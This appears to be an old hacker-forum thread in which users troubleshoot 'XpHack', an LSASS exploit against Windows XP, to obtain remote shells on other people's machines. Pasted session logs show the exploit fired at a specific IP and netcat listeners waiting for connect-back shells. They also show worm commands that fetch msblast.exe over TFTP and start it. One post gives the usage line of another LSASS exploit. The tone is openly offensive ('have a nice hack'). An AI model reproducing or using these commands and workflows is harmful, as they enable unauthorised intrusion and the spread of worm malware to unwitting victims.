Problem, i read the previous thread on this. I get this when I try (if it even works)

[10:07:31pm] [MERKiN] listening on [any] 4444 ...
[10:07:31pm] [MERKiN] connect to [xxx] from xxx.xxx.xxx.xxx [12.75.84.76] 3433
[10:07:31pm] [MERKiN] tftp -i 12.75.84.76 GET msblast.exe
[10:07:31pm] [MERKiN] start msblast.exe
[10:07:31pm] [MERKiN] msblast.exe

then it goes back to my CMD line. That was the older XPHack.exe, compiled straight from the site. Now i understand that someone (forget the name, sorry to whomever you are) compiled a new one. Ok cool, downloaded it, nothing. With my netcat it not letting me type in 0 victim port ip.

my nc.cmd is [ nc.exe -l -v -p 65000 ] and thats it. I have used the first exploit of this nature, and uh... worked. Just ran lsass.exe offset victim port connect back, and had a netcat window open as well... Any insite on this? I'm stumped.

Your netcat listen on port 4444, and you wait some connect back shell. But the worm MSBlast scan ranges with port 4444 open to infect them, because infected box have a shell on this port. So make the test, just listen on that port one night and you will see many msblast connections..the XPHACK lsass exploit work, and return a shell..
So have a nice hack

look at this...


C:\RPC3>xp 128.210.124.155 4444

-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!
C:\RPC3>nc.exe -l -v -p 4444
listening on [any] 4444 ...
connect to [12.x.x.x] from xxx.xxx.xxx.xxx [12.x.x.x] 3892
tftp -i 12.75.78.56 GET msblast.exe
start msblast.exe
msblast.exe
C:\RPC3>

Thing is... the 'to' ip is not right at all. it turns out its an ip in my network... Shall i use another port? This wont stop happening, i know port 4444 is used by msblast.exe .

Thx again

EXPLOiTED

Lol that hapend to me to.....
strange alot of us use 4444 he he
strange this blaster is still out man?

Well the thing is, nothing is actually downloaded. It looks fake in my opinion. It "downloads" from a person in your range. So dismiss the msblaster worm download, for it is never downloaded. I'm just trying to find out why i cannot gain shell. Using the 2000 exploit, i can do it. If there were a "XpHack2.exe" that would have the same format as lsasser.exe which was

lsasstest.exe offset <target> bindport <your ip>

and have NC running on, oh, say port 65000 it would work... If i can be of any help, drop me a line.


EXPLOiT